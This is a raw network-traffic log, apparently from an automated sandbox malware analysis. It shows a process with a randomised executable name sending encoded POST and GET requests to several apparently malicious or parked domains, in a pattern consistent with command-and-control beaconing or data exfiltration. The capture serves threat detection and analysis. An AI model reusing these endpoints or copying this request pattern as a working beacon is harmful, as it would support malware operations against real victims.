                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.thewhitediamond.org
                                                              Origin: http://www.thewhitediamond.org
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.thewhitediamond.org/ufia/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Ascii: XvhP6L=+PiU2N3cRTG3eEKdxa02z2L1UE84xzZWts21XRksN6gSATPgZClZdPRjAEjYcYnL6j3etUYddaidL6jtRdNU/LYK93hKvnroxUvpUj8b0+CiVGHScR9Zc/+MmFt4ry841Jdh0zXyf/MX1o79Q7akpc9GOEapMh3bWfCXnqyUK4MsMXup1BWsbmtkP4bcnBp4ey2KgsEb9d6oRkclOcb0sVIk3BZ9gjRrEaL6630=


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              47 | 192.168.2.7 | 59708 | 3.33.130.190 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:57:37.649007082 CEST | 1750 | OUT | POST /ufia/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.thewhitediamond.org
                                                              Origin: http://www.thewhitediamond.org
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.thewhitediamond.org/ufia/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              48 | 192.168.2.7 | 59709 | 3.33.130.190 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:57:40.193089962 CEST | 447 | OUT | GET /ufia/?Xt7D=9p4tP8lp52ndpXM&XvhP6L=zNK014zjWgi1a3eyzMMm2nz3fX543AdpgfXUQgxXNtpCBS2vIzBVVMdfG2b0NYPX0xafoGIjW7/mcYzzWPwRhMM12G8tl2rgt13dQBJV/fCpNzfTXyNrbuK5i1kogSU8patx4VfAZ+EZ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.thewhitediamond.org
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:57:40.657916069 CEST | 423 | IN | HTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Wed, 11 Sep 2024 20:57:40 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 283
                                                              Connection: close
                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Xt7D=9p4tP8lp52ndpXM&XvhP6L=zNK014zjWgi1a3eyzMMm2nz3fX543AdpgfXUQgxXNtpCBS2vIzBVVMdfG2b0NYPX0xafoGIjW7/mcYzzWPwRhMM12G8tl2rgt13dQBJV/fCpNzfTXyNrbuK5i1kogSU8patx4VfAZ+EZ"}</script></head></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              49 | 192.168.2.7 | 59710 | 199.59.243.226 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:57:46.162014961 CEST | 726 | OUT | POST /6ycu/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.personal-loans-jp8.xyz
                                                              Origin: http://www.personal-loans-jp8.xyz
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.personal-loans-jp8.xyz/6ycu/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Ascii: XvhP6L=1+PZFVMwjA8pXJ8px6oJpwr3LpuimwgfNj0qA0GkLjMskjkE6rKMApmS6WBhRdhClYDUJ1rBJshid8R2UdaP+A4eQ9zZsFmLQ2fRb3w0+U8h+lMzU8csN8lxKaZhpUTnVZghsFcHPQq5IbX+rKxx9HamxMDtME35AZBix9bQjlDyBY8oCXUr6FsFvr8xkixVYMFWvwXHM9yvWz2aKg==
                                                              Sep 11, 2024 22:57:46.635189056 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                              date: Wed, 11 Sep 2024 20:57:45 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1154
                                                              x-request-id: 8d9d543d-c140-4487-b2dd-40882d7ce6d7
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QQ33dbiUXFFl3Iin/huxhj2XRM6u33IvBKXpRu59nUtDFzAxQOGyg9t72Z41OASn9AHDhpeJIv6e7FKXwKQFWQ==
                                                              set-cookie: parking_session=8d9d543d-c140-4487-b2dd-40882d7ce6d7; expires=Wed, 11 Sep 2024 21:12:46 GMT; path=/
                                                              connection: close
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QQ33dbiUXFFl3Iin/huxhj2XRM6u33IvBKXpRu59nUtDFzAxQOGyg9t72Z41OASn9AHDhpeJIv6e7FKXwKQFWQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                              Sep 11, 2024 22:57:46.635238886 CEST | 607 | IN
                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOGQ5ZDU0M2QtYzE0MC00NDg3LWIyZGQtNDA4ODJkN2NlNmQ3IiwicGFnZV90aW1lIjoxNzI2MDg4Mj


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              50 | 192.168.2.7 | 59711 | 199.59.243.226 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:57:48.711452007 CEST | 746 | OUT | POST /6ycu/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.personal-loans-jp8.xyz
                                                              Origin: http://www.personal-loans-jp8.xyz
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.personal-loans-jp8.xyz/6ycu/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Ascii: XvhP6L=1+PZFVMwjA8pWpMp3d8JvQr2OpuioQgbNj4qA2rvLRYslHgE7u+MHpmS12Bge9gAlYP2JwrBJs1id9B2UuCM8Q4cYdzboFmLQ2fRb0MO+U0h+VczUe0jO8l+cKZh/UTjVZgfsHohPSS5IeT+rbxw3Hag/sCpNHqNC49DzdHslSGQEuhKY1YHkUU+rpYHzEsgaNBOiSjmTKXFbhXecTfQxLMxmpqElEmjwcbB9/A=
                                                              Sep 11, 2024 22:57:49.179505110 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                              date: Wed, 11 Sep 2024 20:57:48 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1154
                                                              x-request-id: 4bf4c449-fc5c-47a9-8fac-5ecaec065082
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QQ33dbiUXFFl3Iin/huxhj2XRM6u33IvBKXpRu59nUtDFzAxQOGyg9t72Z41OASn9AHDhpeJIv6e7FKXwKQFWQ==
                                                              set-cookie: parking_session=4bf4c449-fc5c-47a9-8fac-5ecaec065082; expires=Wed, 11 Sep 2024 21:12:49 GMT; path=/
                                                              connection: close
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QQ33dbiUXFFl3Iin/huxhj2XRM6u33IvBKXpRu59nUtDFzAxQOGyg9t72Z41OASn9AHDhpeJIv6e7FKXwKQFWQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                              Sep 11, 2024 22:57:49.179526091 CEST | 607 | IN
                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNGJmNGM0NDktZmM1Yy00N2E5LThmYWMtNWVjYWVjMDY1MDgyIiwicGFnZV90aW1lIjoxNzI2MDg4Mj


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              51 | 192.168.2.7 | 59712 | 199.59.243.226 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:57:51.260771990 CEST | 1759 | OUT | POST /6ycu/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.personal-loans-jp8.xyz
                                                              Origin: http://www.personal-loans-jp8.xyz
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.personal-loans-jp8.xyz/6ycu/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:57:51.739876032 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                              date: Wed, 11 Sep 2024 20:57:51 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1154
                                                              x-request-id: 78f52b59-0c6c-4bba-b5aa-f91a7dd96be6
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QQ33dbiUXFFl3Iin/huxhj2XRM6u33IvBKXpRu59nUtDFzAxQOGyg9t72Z41OASn9AHDhpeJIv6e7FKXwKQFWQ==
                                                              set-cookie: parking_session=78f52b59-0c6c-4bba-b5aa-f91a7dd96be6; expires=Wed, 11 Sep 2024 21:12:51 GMT; path=/
                                                              connection: close
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QQ33dbiUXFFl3Iin/huxhj2XRM6u33IvBKXpRu59nUtDFzAxQOGyg9t72Z41OASn9AHDhpeJIv6e7FKXwKQFWQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                              Sep 11, 2024 22:57:51.739948988 CEST | 607 | IN
                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzhmNTJiNTktMGM2Yy00YmJhLWI1YWEtZjkxYTdkZDk2YmU2IiwicGFnZV90aW1lIjoxNzI2MDg4Mj


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              52 | 192.168.2.7 | 59713 | 199.59.243.226 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:57:53.805466890 CEST | 450 | OUT | GET /6ycu/?XvhP6L=48n5Gh86tilVUpEn3bMYkhqvO5up5zkqTgQXBFakbnd6q0dGuIyBO7mD/1tgIewitYTTRw7cds46U990bsqw3nwlebvgtAe1RUGRB2MI0lkiowd2cOo1HMJgELRUlBXSLJgYq2E6HCqo&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.personal-loans-jp8.xyz
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:57:54.255080938 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                              date: Wed, 11 Sep 2024 20:57:53 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1550
                                                              x-request-id: d8ff9628-c9ec-4997-8638-68d581f9d319
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_sLa8zY3UhaEKNBZ46mViv+0v1W5si+fK0gfqNkaiO88r+FAaGdq/poAp36WoE4RND+cKLYprUXAmyqplZLJlrg==
                                                              set-cookie: parking_session=d8ff9628-c9ec-4997-8638-68d581f9d319; expires=Wed, 11 Sep 2024 21:12:54 GMT; path=/
                                                              connection: close
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_sLa8zY3UhaEKNBZ46mViv+0v1W5si+fK0gfqNkaiO88r+FAaGdq/poAp36WoE4RND+cKLYprUXAmyqplZLJlrg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                              Sep 11, 2024 22:57:54.255122900 CEST | 1003 | IN
                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDhmZjk2MjgtYzllYy00OTk3LTg2MzgtNjhkNTgxZjlkMzE5IiwicGFnZV90aW1lIjoxNzI2MDg4Mj


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              53 | 192.168.2.7 | 59714 | 188.114.96.3 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:58:07.519224882 CEST | 693 | OUT | POST /x5bi/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.chinaen.org
                                                              Origin: http://www.chinaen.org
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.chinaen.org/x5bi/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:58:08.562009096 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Date: Wed, 11 Sep 2024 20:58:08 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Product: Z-BlogPHP 1.7.3
                                                              X-XSS-Protection: 1; mode=block
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=92Wdj3XRE%2FjkwsrG8whjbWBvclKY%2F6cMHWO4wsK7IOi5sFSz8YR6U%2B%2Bri1oOVawtrw8eQTWIwmxvDt8HgrsPp%2BiN6bYGPBq8OPU4ipWy9bl4WlKZBAUcVsKTZzsXRjNRyAk%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c1a92f79a2d43d4-EWR
                                                              Content-Encoding: gzip
                                                              alt-svc: h3=":443"; ma=86400


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              54 | 192.168.2.7 | 59715 | 188.114.96.3 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:58:10.068998098 CEST | 713 | OUT | POST /x5bi/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.chinaen.org
                                                              Origin: http://www.chinaen.org
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.chinaen.org/x5bi/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:58:11.093650103 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Date: Wed, 11 Sep 2024 20:58:11 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Product: Z-BlogPHP 1.7.3
                                                              X-XSS-Protection: 1; mode=block
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AXiRVfftg3JAv89xk2bLNujjfrQWM6Fe4os0VnvQBLCJl2T5c9acTASNmX%2Bu%2BbuRPN3SsHg52SFUreAEXYpUhmg9F%2FDIYZzJgWMCzBQMrt0PhwYtybKBx8mSqeBBY9VXTyI%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c1a93078f7043fd-EWR
                                                              Content-Encoding: gzip
                                                              alt-svc: h3=":443"; ma=86400


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              55 | 192.168.2.7 | 59716 | 188.114.96.3 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:58:12.618120909 CEST | 1726 | OUT | POST /x5bi/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.chinaen.org
                                                              Origin: http://www.chinaen.org
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.chinaen.org/x5bi/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:58:13.608714104 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Date: Wed, 11 Sep 2024 20:58:13 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Product: Z-BlogPHP 1.7.3
                                                              X-XSS-Protection: 1; mode=block
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PqKl6BrJbH3ukjPgXID845WlmgfA8QHky%2BniyN6OVDriwlMOBAATDG08YYh4h7DiVlFWlr%2FQ1UNt9HSxEXoH3Cnz7eyA8k1UkmMR2yfc7pAF1mHGQvs7PO2ZDRBgVmfBtAM%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c1a93174b44c41d-EWR
                                                              Content-Encoding: gzip
                                                              alt-svc: h3=":443"; ma=86400


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              56 | 192.168.2.7 | 59717 | 188.114.96.3 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:58:15.159970999 CEST | 439 | OUT | GET /x5bi/?XvhP6L=JYCf+ZJomMv21wL/A/ZbfBFGIgJsU/wUGcnjHUxnhitVEbVd5ES97oujxAxH+SE+IOTeV6meH+QeTEXNSn72wswjM27hcTXz9HzWUY9luI/8WXXgEAe/tU5ADSlVG/RuaZzqE+6xfFdK&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.chinaen.org
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:58:16.140569925 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Date: Wed, 11 Sep 2024 20:58:16 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Product: Z-BlogPHP 1.7.3
                                                              X-XSS-Protection: 1; mode=block
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i9MJq09%2BW9Mq3wEu%2BZ5XPtM3PrdzfbBDkf7KljLDx7CACf%2FbK2qBtQN0gBP%2Fnx0UFGrIR4NChHFPl20jTqpUFuSXH3BelFUiEMDOsRst%2F95Z0e4FFvv7scI5iz7hstSCIFU%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c1a93273997423b-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              Data Ascii: 1e97<!doctype html><html><head><meta charset="utf-8"><meta name="renderer" content="webkit"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="applicable-device"content="pc,mobile"><meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1"><title>404! - </title><link href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.css" rel="stylesheet"><link href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swipe
                                                              Sep 11, 2024 22:58:16.140666008 CEST | 224 | IN | Data Ascii: r-4.3.3.min.css" rel="stylesheet"><link rel="stylesheet" type="text/css" href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/normalize.css" /><link rel="stylesheet" type="text/css" href="http://www.chinaen.o
                                                              Sep 11, 2024 22:58:16.140691996 CEST | 1236 | IN | Data Ascii: rg/zb_users/theme/yd1125free/style/style.min.css?v=1.2.4" /><script src="http://www.chinaen.org/zb_system/script/jquery-2.2.4.min.js" type="text/javascript"></script><script src="http://www.chinaen.org/zb_system/script/zblogphp.js" type="t
                                                              Sep 11, 2024 22:58:16.140728951 CEST | 1236 | IN | Data Ascii: chinaen.org/search.php?act=search"><input type="text" name="q" placeholder=""/><button type="submit" class="submit" value=""><i class="fa fa-search"></i></button></form></div><div class="mnav"><i c
                                                              Sep 11, 2024 22:58:16.140744925 CEST | 1236 | IN | Data Ascii: <li><a href="http://www.chinaen.org/lol/204.html" target="_blank" title="[]3.3? ">[]3.3? </a><span>2
                                                              Sep 11, 2024 22:58:16.140760899 CEST | 1236 | IN | Data Ascii: >3<span class="datetime"> (08-25)</span></span></li><li><a href="http://www.chinaen.org/lol/199.html" target="_blank" title="[JR]KSGAG ">[J
                                                              Sep 11, 2024 22:58:16.140867949 CEST | 1236 | IN | Data Ascii: class="datetime"> (08-24)</span></span></li><li><a href="http://www.chinaen.org/lol/195.html" target="_blank" title=" ">
                                                              Sep 11, 2024 22:58:16.140883923 CEST | 552 | IN | Data Ascii: ustom.js?v=1.2.4" type="text/javascript"></script><script>jQuery(document).ready(function($) {jQuery('.main_left').theiaStickySidebar({ additionalMarginTop: 10,});});</script><script>$.ias({ thresholdMargin: -100, triggerPageThreshold:
                                                              Sep 11, 2024 22:58:16.140963078 CEST | 319 | IN | Data Ascii: r: '', // .ias_trigger .ias_trigger a onPageChange: function (pageNum, pageUrl, scrollOffset) { window._gaq && window._gaq.push(['_trackPageview', jQuery('<a/>').attr('href', pageUrl)[0].pa


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                              57 | 192.168.2.7 | 59718 | 154.23.184.218 | 80
                                                              Timestamp | Bytes transferred | Direction | Data
